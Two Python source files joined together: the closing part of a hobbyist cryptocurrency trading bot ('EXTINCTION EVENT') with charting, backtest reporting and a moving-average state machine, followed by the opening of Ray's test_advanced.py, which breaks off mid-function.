markersize=10, marker='^', color='lime', label='buy')
chart_star()
plt.pause(0.001)
def live_chart_latest(): # Plot last 24hrs of 5m candles
now = int(time.time())
days = 1
candle = 300
d = backtest_candles(PAIR, (now - days * 86400), now, candle)
high = d['high']
low = d['low']
close = d['close']
unix = d['unix']
for i in range(len(unix)):
now = unix[i]
if low[i] < close[i]:
plt.plot(now, low[i], markersize=6, marker='.',
color='m', label='low')
if high[i] > close[i]:
plt.plot(now, high[i], markersize=6, marker='.',
color='m', label='high')
plt.plot(now, close[i], markersize=2, marker='.',
color='y', label='close')
plt.pause(0.001)
def test_chart_latest(): # Plot high resolution end of backtest
# plot 1 day of 5m candles
days = 1
candle = 300
d = backtest_candles(
PAIR, (info['end'] - days * 86400), info['end'], candle)
high = d['high']
low = d['low']
close = d['close']
unix = d['unix']
for i in range(len(unix)):
now = unix[i]
if low[i] < close[i]:
plt.plot((now), (high[i]), markersize=4, marker='.',
color='m', label='high')
if high[i] > close[i]:
plt.plot((now), (low[i]), markersize=4, marker='.',
color='m', label='low')
plt.plot((now), (close[i]), markersize=4, marker='.',
color='y', label='close')
# plot last 30 days of 2h
days = 30
candle = 7200
d = backtest_candles(
PAIR, (info['end'] - days * 86400), info['end'], candle)
high = d['high']
low = d['low']
close = d['close']
unix = d['unix']
for i in range(len(unix)):
now = unix[i]
if low[i] < close[i]:
plt.plot((now), (high[i]), markersize=4, marker='.',
color='m', label='high')
if high[i] > close[i]:
plt.plot((now), (low[i]), markersize=4, marker='.',
color='m', label='low')
plt.plot((now), (close[i]), markersize=4, marker='.',
color='y', label='close')
plt.pause(0.001)
def test_chart(): # Add objects to backtest plot
# localize data
now = info['current_time']
ma1 = storage['ma1'][-1]
ma2 = storage['ma2'][-1]
close = storage['close']
high = storage['high']
low = storage['low']
selloff = storage['selloff']
despair = storage['despair']
resistance = storage['resistance']
support = storage['support']
max_cross = storage['max_cross']
min_cross = storage['min_cross']
market_cross = storage['market_cross']
buying = storage['buying']
selling = storage['selling']
draw_state_machine(now, selloff, support,
resistance, despair, buying, selling,
min_cross, max_cross, market_cross, ma2)
# plot candles
plt.plot((now, now), ((high[-1]), (low[-1])),
color='m', label='high_low', alpha=0.5)
plt.plot(now, (close[-1]), markersize=4, marker='.',
color='y', label='close')
if info['tick'] == 0:
chart_star()
def live_chart(): # Add objects to live plot
book = storage['book']
cex_rate = storage['cex_rate']
dex_rate = storage['dex_rate']
m_volume = storage['m_volume']
ma1 = storage['ma1'][-1]
ma2 = storage['ma2'][-1]
ma3 = storage['ma3'][-1]
ma4 = storage['ma4'][-1]
selloff = storage['selloff']
despair = storage['despair']
resistance = storage['resistance']
support = storage['support']
buying = storage['buying']
selling = storage['selling']
ask = book['askp'][0]
bid = book['bidp'][0]
scalp_resistance = storage['scalp_resistance']
scalp_support = storage['scalp_support']
max_cross = storage['max_cross']
min_cross = storage['min_cross']
market_cross = storage['market_cross']
now = info['current_time']
high = storage['high']
low = storage['low']
# plot state machine
draw_state_machine(now, selloff, support,
resistance, despair, buying, selling,
min_cross, max_cross, market_cross, ma2)
plt.plot(now, high,
markersize=3, marker='.', color='m', label='high')
plt.plot(now, low,
markersize=3, marker='.', color='m', label='low')
plt.plot(now, scalp_resistance, markersize=4, marker='.',
color='tomato', label='scalp_resistance')
plt.plot(now, scalp_support, markersize=4, marker='.',
color='palegreen', label='scalp_support')
plt.plot(now, ask, markersize=3, marker='.',
color='aqua', label='ask')
plt.plot(now, bid, markersize=3, marker='.',
color='aqua', label='bid')
plt.plot(now, dex_rate, markersize=4 * m_volume, marker='.',
color='khaki', label='dex_rate')
plt.plot(now, cex_rate, markersize=4 * m_volume, marker='.',
color='yellow', label='cex_rate')
if info['tick'] == 0:
# clone the backtest in higher resolution for last 24hrs
plt.plot((now, now), (selloff, despair),
color='white', label='vertical start', lw=5, alpha=0.2)
ma1_period = MA1 * 86400 / 7200.0
ma2_period = MA2 * 86400 / 7200.0
ma1_arr = float_sma(data['7200']['close'], ma1_period)
ma2_arr = float_sma(data['7200']['close'], ma2_period)
unix = data['7200']['unix']
for i in range(-1, -20, -1):
for z in range(0, 7200, 300):
try:
now = unix[i] + z
ma1 = ma1_arr[i]
ma2 = ma2_arr[i]
# state machine clone
min_cross = MIN_CROSS * ma1
max_cross = MAX_CROSS * min_cross
bull_stop = BULL_STOP * ma2
bear_stop = BEAR_STOP * ma2
selloff = SELLOFF * ma1
despair = DESPAIR * ma1
support = max((SUPPORT * ma1), bull_stop)
resistance = min((RESISTANCE * ma1), bear_stop)
if market_cross:
selling = selloff
buying = support
else:
buying = despair
selling = resistance
# plot state machine
draw_state_machine(now, selloff, support,
resistance, despair, buying, selling,
min_cross, max_cross, market_cross, ma2)
except:
print ('plot ma_arr failed')
pass
chart_star()
plt.pause(0.001)
def chart_star(): # Plot a star at begin and end of backtest
now = info['current_time']
if info['live']:
cex_rate = storage['cex_rate']
else:
cex_rate = (storage['close'][-1])
plt.plot(now, cex_rate, markersize=50,
marker='1', color='w', label='cex_rate')
plt.plot(now, cex_rate, markersize=40,
marker='2', color='y', label='cex_rate')
plt.plot(now, cex_rate, markersize=40,
marker='3', color='w', label='cex_rate')
plt.plot(now, cex_rate, markersize=50,
marker='4', color='y', label='cex_rate')
plt.plot(now, cex_rate, markersize=15,
marker='.', color='y', label='cex_rate')
def plot_format(): # Set plot colors and attributes
warnings.filterwarnings("ignore", category=cbook.mplDeprecation)
ax = plt.gca()
ax.patch.set_facecolor('0.1')
ax.yaxis.tick_right()
ax.spines['bottom'].set_color('0.5')
ax.spines['top'].set_color(None)
ax.spines['right'].set_color('0.5')
ax.spines['left'].set_color(None)
ax.tick_params(axis='x', colors='0.7', which='both')
ax.tick_params(axis='y', colors='0.7', which='both')
ax.yaxis.label.set_color('0.9')
ax.xaxis.label.set_color('0.9')
plt.minorticks_on
plt.grid(b=True, which='major', color='0.2', linestyle='-')
plt.grid(b=True, which='minor', color='0.2', linestyle='-')
if (info['live'] is False) and (info['tick'] > 1):
plt.ylabel('LOGARITHMIC PRICE SCALE')
plt.yscale('log')
if info['live'] is True:
plt.ylabel('MARKET PRICE')
ax.yaxis.set_major_formatter(matplotlib.ticker.ScalarFormatter())
ax.yaxis.set_minor_formatter(matplotlib.ticker.ScalarFormatter())
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter("%.8f"))
ax.yaxis.set_minor_formatter(matplotlib.ticker.FormatStrFormatter("%.8f"))
if info['live']:
stepsize = 3600
else:
if DAYS > 100:
stepsize = 2592000
elif DAYS > 20:
stepsize = 864000
else:
stepsize = 86400
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange((end - end % 3600), start, -stepsize))
def timestamp(x, pos):
if not info['live']:
return (datetime.fromtimestamp(x)).strftime('%Y-%m-%d')
else:
return (datetime.fromtimestamp(x)).strftime('%m/%d %H:%M')
ax.xaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(timestamp))
if info['tick'] > 1:
# force 'autoscale'
yd = [] # matrix of y values from all lines on plot
xd = [] # matrix of x values from all lines on plot
for n in range(len(plt.gca().get_lines())):
line = plt.gca().get_lines()[n]
yd.append((line.get_ydata()).tolist())
xd.append((line.get_xdata()).tolist())
yd = [item for sublist in yd for item in sublist]
ymin, ymax = np.min(yd), np.max(yd)
ax.set_ylim([0.95 * ymin, 1.05 * ymax])
xd = [item for sublist in xd for item in sublist]
xmin, xmax = np.min(xd), np.max(xd)
ax.set_xlim([xmin, xmax])
if (info['live'] is False):
# add sub minor ticks
set_sub_formatter = []
sub_ticks = [10, 11, 12, 14, 16, 18, 22, 25, 35, 45]
sub_range = [-8, 8]
for i in sub_ticks:
for j in range(sub_range[0], sub_range[1]):
set_sub_formatter.append(i * 10 ** j)
k = []
for l in set_sub_formatter:
if ymin < l < ymax:
k.append(l)
ax.set_yticks(k)
if info['live']:
start, end = ax.get_ylim()
stepsize = abs(start - end) / 25
ax.yaxis.set_ticks(np.arange(end, start, -stepsize))
plt.gcf().autofmt_xdate(rotation=30)
ax.title.set_color('darkorchid')
#plt.title(('%s ' % PAIR) + VERSION)
plt.tight_layout()
def plot_text(): # Display market condition on plot
# clear text
storage['text'] = storage.get('text', [])
for text in storage['text']:
try:
text.remove()
except:
pass
# static text
textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.8 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(plt.text(textx, texty,
'litepresence', color='aqua',
alpha=0.2, size=70))
textx = 0.27 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.7 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(plt.text(textx, texty,
'EXTINCTION EVENT', color='aqua',
alpha=0.3, size=25, weight='extra bold'))
textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.08 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(
plt.text(textx, texty, '(BTS) litepresence1',
color='white', alpha=0.5, size=10, weight='extra bold'))
textx = 0.4 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.1 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(
plt.text(textx, texty, (ASSET + CURRENCY),
color='yellow', alpha=0.1, size=70, weight='extra bold'))
textx = 0.6 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
text = 'BACKTEST '
if info['live']:
text = 'LIVE '
text += storage['asset_name']
storage['text'].append(
plt.text(textx, texty, text,
color='yellow', alpha=0.25, size=20, weight='extra bold'))
# dynamic text
if info['live']:
high = storage['cex_rate']
low = storage['cex_rate']
else:
high = storage['high'][-1]
low = storage['low'][-1]
textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.1 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
if storage['market_cross']:
storage['text'].append(
plt.text(textx, texty, 'BULL MARKET',
color='lime', alpha=0.3, size=30, weight='extra bold'))
textx = 0.125 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
if low < storage['buying']:
storage['text'].append(
plt.text(textx, texty, 'BUY SUPPORT',
color='lime', alpha=0.5, size=20,
weight='extra bold'))
elif high > storage['selling']:
storage['text'].append(
plt.text(textx, texty, 'SELL OVERBOUGHT',
color='red', alpha=0.5, size=20,
weight='extra bold'))
else:
storage['text'].append(
plt.text(textx, texty, 'BEAR MARKET',
color='red', alpha=0.3, size=30, weight='extra bold'))
textx = 0.125 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
if low < storage['buying']:
storage['text'].append(
plt.text(textx, texty, 'BUY DESPAIR',
color='lime', alpha=0.5, size=20,
weight='extra bold'))
elif high > storage['selling']:
storage['text'].append(
plt.text(textx, texty, 'SELL RESISTANCE',
color='red', alpha=0.5, size=20, weight='extra bold'))
plt.tight_layout()
def test_plot(): # Display backtest plot
begin = info['begin']
end = info['end']
while (end - begin) > LIVE_PLOT_DEPTH:
# PLOT FORMAT
try:
ax = plt.gca()
# Window Plot
left, right = ax.set_xlim(left=begin - 50, right=end + 50)
# Prevent Memory Leak Outside Plot Window
for l in ax.get_lines():
xval = l.get_xdata()[0]
if (xval < begin):
l.remove()
if LIVE:
begin = begin + 0.3 * (end - begin)
else:
begin = end
plt.tight_layout()
plt.pause(0.0001)
except:
print('animated test plot failed')
plot_text()
plot_format()
# if LIVE: plt.clf() # clear the plotted figure; end log scale
if BACKTEST:
try:
plt.autoscale(enable=True, axis='y')
plt.pause(0.0001)
except:
print('static test plot failed')
def live_plot(): # Display live plot
now = int(time.time())
ax = plt.gca()
# Window Plot
ax.set_xlim(([(now - LIVE_PLOT_DEPTH), (now)]))
# Prevent Memory Leak Outside Plot Window; remove unnecessary data
for l in ax.get_lines():
xval = l.get_xdata()[0]
if (xval < (ax.get_xlim()[0])):
l.remove()
plot_text()
plt.tight_layout()
plt.pause(0.0001)
def test_stop(): # Display results of backtest session
close = storage['close'][-1]
# ctime_tick_labels()
# move to currency
if BACKTEST and (portfolio['assets'] > 0.1) and CURRENCY_STOP:
print('stop() EXIT TO CURRENCY')
test_sell(price=close)
# calculate return on investment
end_max_assets = portfolio['assets'] + (portfolio['currency'] / close)
end_max_currency = portfolio['currency'] + (portfolio['assets'] * close)
roi_assets = end_max_assets / storage['begin_max_assets']
roi_currency = end_max_currency / storage['begin_max_currency']
storage['roi_currency'] = roi_currency
days = (info['end'] - info['begin']) / 86400.0
frequency = (SATOSHI + storage['trades']) / days
storage['dpt'] = 1.0 / frequency
# A = P*(1+(r/n))**(n*t)
P = storage['begin_max_currency']
t = DAYS / 365.0
A = end_max_currency
n = 1.0
r = n * ((A / P) ** (1 / (n * t)) - 1)
storage['apy_currency'] = r
if LIVE or BACKTEST:
print(
'===============================================================')
print(('START DATE........: %s' % time.ctime(info['begin'])))
print(('END DATE..........: %s' % time.ctime(info['end'])))
print(('DAYS..............: %.1f' % days))
print(('TRADES............: %s' % storage['trades']))
print(('DAYS PER TRADE....: %.1f' % storage['dpt']))
print(('START PRICE.......: %.8f ' % data['close'][-DAYS]))
print(('END PRICE.........: %.8f' % close))
print(('START PORTFOLIO...: %.1f %s %.1f %s' %
(START_CURRENCY, CURRENCY, START_ASSETS, ASSET)))
print(
('START MAX ASSETS..: %s %s' %
(storage['begin_max_assets'], ASSET)))
print(('END MAX ASSETS....: %s %s' % (end_max_assets, ASSET)))
print(('ROI ASSETS........: %.2fX' % roi_assets))
print(('START MAX CURRENCY: %s %s' %
(storage['begin_max_currency'], CURRENCY)))
print(('END MAX CURRENCY..: %s %s' % (end_max_currency, CURRENCY)))
print(('ROI CURRENCY......: %.2fX' % roi_currency))
# print(('APY CURRENCY......: %.2f' % storage['apy_currency']))
print(
'===============================================================')
print(VERSION)
print('~===END BACKTEST=========================~')
test_rechart_orders()
def print_tune(): # Display input thresholds
storage['roi_currency'] = storage.get('roi_currency', ROI)
storage['apy_currency'] = storage.get('apy_currency', APY)
storage['dpt'] = storage.get('dpt', DPT)
storage['trades'] = storage.get('trades', 0)
frequency = (SATOSHI + storage['trades']) / DAYS
z = '+=' if OPTIMIZE else '='
print('#######################################')
print(('CURRENCY = "%s"' % CURRENCY))
print(('ASSET = "%s"' % ASSET))
print(('MA1 %s %.2f' % (z, MA1)))
print(('MA2 %s %.2f' % (z, MA2)))
print(('SELLOFF %s %.3f' % (z, SELLOFF)))
print(('SUPPORT %s %.3f' % (z, SUPPORT)))
print(('RESISTANCE %s %.3f' % (z, RESISTANCE)))
print(('DESPAIR %s %.3f' % (z, DESPAIR)))
print(('MIN_CROSS %s %.3f' % (z, MIN_CROSS)))
print(('MAX_CROSS %s %.3f' % (z, MAX_CROSS)))
print(('BULL_STOP %s %.3f' % (z, BULL_STOP)))
print(('BEAR_STOP %s %.3f' % (z, BEAR_STOP)))
print('#######################################')
# print(('# RESOLUTION : %s' % RESOLUTION))
print(('# DAYS : %s' % DAYS))
print(('DPT = %.1f' % storage['dpt']))
print(('# MARKET CAP....: %.1fM' % asset_cap))
print(('# DOMINANCE.....: %.4f - RANK %s' % (asset_dominance, asset_rank)))
print(('ROI = %.2fX' % storage['roi_currency']))
# print(('APY = %.2f' % storage['apy_currency']))
print('#######################################')
def bell(duration=2, frequency=432): # Activate linux audible bell
pass
'''
os.system('play --no-show-progress --null --channels 1 synth' +
' %s sine %f' % (duration*1000, frequency))
'''
def gmail():
pass
'''
send_to = "THE EMAIL ADDRESS TO SEND TO"
send_from = "YOUR EMAIL ADDRESS"
pass = "YOUR PASSWORD"
msg = "YOUR MESSAGE!"
import smtplib
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(send_from, pass)
server.sendmail(send_from, send_to, msg)
server.quit()
'''
# DIAGNOSTICS
# ======================================================================
def msg_(e): # traceback message
print(' !@#$%^&*(){}[]{}()*&^%$#@!')
print('send questions, comments, and pastebin of pertinent logs')
print('to @litepresence on telegram for faster development')
print('')
return ('=========================================================================='+
'\n\n' + str(time.ctime()) + ' ' + str(type(e).__name__) +
'\n\n' + str(e.args) +
'\n\n' + str(traceback.format_exc()) +
'\n\n' )
def diagnostics(level=[]):
try:
import psutil # REQUIRES MODULE INSTALL
proc = psutil.Process()
if 1 in level:
num_open_files = proc.num_fds()
print('')
print('file descriptors:', num_open_files)
print('connections:', len(proc.connections()))
if 2 in level:
import psutil
proc = psutil.Process()
n = 1
open_files = proc.open_files()
for i in range(len(open_files)):
if 'ttf' not in str(open_files[i]):
print (n, str(open_files[i]).split('/')[-1])
n+=1
print(proc.io_counters())
connections = proc.connections()
for i in range(len(connections)):
print (i, connections[i])
print('')
processes = psutil.process_iter()
for i in range(len(processes)):
print (i, processes[i])
print('')
except Exception as e:
msg = str(type(e).__name__) + str(e.args + 'psutil')
print(msg)
if 3 in level:
fds = {}
base = '/proc/self/fd'
for num in os.listdir(base):
try:
fds[int(num)] = os.readlink(os.path.join(base, num))
except:
pass
print(fds)
print('')
# DATA PROCESSING
# ======================================================================
def clock(): # 24 hour clock formatted HH:MM:SS
return str(time.ctime())[11:19]
def satoshi(n): # format prices to satoshi type
return float('%.8f' % float(n))
def satoshi_str(n):
return ('%.8f' % float(n))
def dictionaries(): # Global info, data, portfolio, and storage
global info, storage, portfolio, book
info = {}
book = {}
storage = {}
portfolio = {}
def coin_name(): # Convert ticker symbols to coin names
curr = currencies()
storage['asset_name'] = curr[ASSET]['CoinName']
storage['currency_name'] = curr[CURRENCY]['CoinName']
print((storage['asset_name']))
def ctime_tick_labels(): # X axis timestamps formatting
ax = plt.gca()
fig.canvas.draw()
labels = ax.get_xticklabels()
xlabels = []
for label in labels:
x = label.get_text()
print(x)
try:
xlabels.append(float(x))
except:
xlabels.append(str(x))
for i in range(len(xlabels)):
try:
if isinstance(xlabels[i], float):
xlabels[i] = time.ctime(float(xlabels[i]))
except:
pass
ax.set_xticklabels(xlabels)
def indicators(): # Post process data
global storage
global book
ma1_period = MA1 * 86400.0 / CANDLE
ma2_period = MA2 * 86400.0 / CANDLE
if not info['live']:
# alpha moving averages
storage['ma1'] = float_sma(storage['close'], ma1_period)
storage['ma2'] = float_sma(storage['close'], ma2_period)
if info['live']:
# alpha moving averages
storage['ma1'] = float_sma(
data['7200']['close'], ma1_period)
storage['ma2'] = float_sma(
data['7200']['close'], ma2_period)
# scalp moving averages
storage['ma3'] = float_sma(data['300']['close'], 288 * MA3)
storage['ma4'] = float_sma(data['300']['close'], 288 * MA4)
# 20 minute high and low
storage['high'] = max(data['300']['high'][-4:])
storage['low'] = min(data['300']['low'][-4:])
cex_rate = storage['cex_rate']
# means to buy and percent invested
assets = portfolio['assets']
currency = portfolio['currency']
means = storage['means'] = currency / cex_rate
max_assets = storage['max_assets'] = (assets + means)
storage['max_currency'] = max_assets * cex_rate
storage['asset_ratio'] = assets / max_assets
portfolio['percent_invested'] = 100 * storage['asset_ratio']
portfolio['percent_divested'] = 100 - portfolio['percent_invested']
# recent volume ratio for plotting
depth = 100
mv = ((depth * data['300']['volume'][-1]) /
sum(data['300']['volume'][-depth:]))
storage['m_volume'] = 1 if mv < 1 else 5 if mv > 5 else mv
def float_sma(array, period): # floating point period moving average
def moving_average(array, period): # numpy array moving average
csum = np.cumsum(array, dtype=float)
csum[period:] = csum[period:] - csum[:-period]
return csum[period - 1:] / period
if period == int(period):
return moving_average(array, int(period))
else:
floor_period = int(period)
ceil_period = int(floor_period + 1)
floor_ratio = ceil_period - period
ceil_ratio = 1.0 - floor_ratio
floor = moving_average(array, floor_period)
ceil = moving_average(array, ceil_period)
depth = min(len(floor), len(ceil))
floor = floor[-depth:]
ceil = ceil[-depth:]
ma = (floor_ratio * floor) + (ceil_ratio * ceil)
return ma
# ARTIFICIAL INTELLEGENCE
# ======================================================================
def state_machine(): # Alpha and beta market finite state
# localize primary indicators
ma1 = storage['ma1'][-1]
ma2 = storage['ma2'][-1]
min_cross = storage['min_cross'] = MIN_CROSS * ma1
max_cross = storage['max_cross'] = MAX_CROSS * storage['min_cross']
# set alpha state
storage['market_cross'] = storage.get('market_cross', MARKET_CROSS)
if storage['market_cross'] is False:
if (min_cross > ma2):
storage['market_cross'] = True
if storage['market_cross'] is True:
if (max_cross < ma2):
storage['market_cross'] = False
# Manual override alpha state
if info['live']:
if FORCE_ALPHA == 'BULL':
storage['market_cross'] = True
if FORCE_ALPHA == 'BEAR':
storage['market_cross'] = False
# establish beta thresholds
storage['selloff'] = (ma1 * SELLOFF)
storage['support'] = max(ma1 * SUPPORT, ma2 * BULL_STOP)
storage['resistance'] = min(ma1 * RESISTANCE, ma2 * BEAR_STOP)
storage['despair'] = (ma1 * DESPAIR)
# initialize backtest per MARKET_CROSS
if (info['live'] is False) and (info['tick'] == 0):
close = storage['close'][-1]
storage['selling'] = storage['buying'] = close
if MARKET_CROSS is True:
if START_CURRENCY > 0:
test_buy(close)
if MARKET_CROSS is False:
if START_ASSETS > 0:
test_sell(close)
# set beta state
if storage['market_cross']:
storage['buying'] = storage['support']
storage['selling'] = storage['selloff']
else:
storage['buying'] = storage['despair']
storage['selling'] = storage['resistance']
storage['mid_market'] = (storage['buying'] + storage['selling']) / 2
def optimizer():
pass
# PRIMARY PROCESS
# ======================================================================
if __name__ == "__main__":
race_write(doc='EV_log.txt', text=time.ctime())
banner()
version()
tune_install()
keys_install()
asset_cap, asset_dominance, asset_rank = marketcap()
optimize = False
data = {}
control_panel()
dictionaries()
initialize()
test_initialize()
coin_name()
if (MODE in [2, 3, 6]) or BACKTEST:
backtest()
print_tune()
if MODE in [2, 3, 6]:
print('')
print('report errors to litepresence for faster development')
print('')
live()
if OPTIMIZE:
optimizer()
print ('https://www.youtube.com/watch?v=5ydqjqZ_3oc')
sys.exit()
# ======================================================================
''' EXTINCTION EVENT '''
# ======================================================================
#
# THE DESTROYER,
# litepresence - 2018
#
|
test_advanced.py
|
# coding: utf-8
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import random
import sys
import threading
import time
import os
import numpy as np
import pytest
import ray.cluster_utils
import ray._private.profiling as profiling
from ray._private.test_utils import (client_test_enabled,
RayTestTimeoutException, SignalActor)
if client_test_enabled():
from ray.util.client import ray
else:
import ray
logger = logging.getLogger(__name__)
# issue https://github.com/ray-project/ray/issues/7105
@pytest.mark.skipif(client_test_enabled(), reason="internal api")
def test_internal_free(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
class Sampler:
def sample(self):
return [1, 2, 3, 4, 5]
def sample_big(self):
return np.zeros(1024 * 1024)
sampler = Sampler.remote()
# Free deletes from in-memory store.
obj_ref = sampler.sample.remote()
ray.get(obj_ref)
ray.internal.free(obj_ref)
with pytest.raises(Exception):
ray.get(obj_ref)
# Free deletes big objects from plasma store.
big_id = sampler.sample_big.remote()
ray.get(big_id)
ray.internal.free(big_id)
time.sleep(1) # wait for delete RPC to propagate
with pytest.raises(Exception):
ray.get(big_id)
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(input_list):
# The argument input_list should be a list containing one object ref.
ray.wait([input_list[0]])
@ray.remote
def h(input_list):
# The argument input_list should be a list containing one object ref.
ray.get(input_list[0])
# Make sure that multiple wait requests involving the same object ref
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ref all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
@pytest.mark.skipif(client_test_enabled(), reason="internal api")
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
@pytest.mark.skipif(client_test_enabled(), reason="internal api")
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
# the function should only run on the current driver once.
assert sys.path[-1] == "fake_directory"
if len(sys.path) > 1:
assert sys.path[-2] != "fake_directory"
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
@pytest.mark.skipif(
"RAY_PROFILING" not in os.environ,
reason="Only tested in client/profiling build.")
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with profiling.profile(
"custom_event", extra_data={"name": "custom name"}):
pass
ray.put(1)
object_ref = f.remote()
ray.wait([object_ref])
ray.get(object_ref)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
profile_data = ray.timeline()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
# TODO (Alex) :https://github.com/ray-project/ray/pull/9346
# "register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
if time.time() - start_time > timeout_seconds:
raise RayTestTimeoutException(
"Timed out while waiting for information in "
"profile table. Missing events: {}.".format(
set(expected_types) - set(event_types)))
# The profiling information only flushes once every second.
time.sleep(1.1)
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
@pytest.mark.skip(reason="TODO(ekl)")
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(address=cluster.address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_refs = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_ref in object_refs:
ray.get([
f._remote(args=[object_ref], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.state.object_transfer_timeline()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g(): # noqa: F811
return 2
@ray.remote # noqa: F811
def g(): # noqa: F811
return 3
@ray.remote # noqa: F811
def g(): # noqa: F811
return 4
@ray.remote # noqa: F811
def g(): # noqa: F811
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectRef.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
@pytest.mark.skipif(
client_test_enabled(), reason="grpc interaction with releasing resources")
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
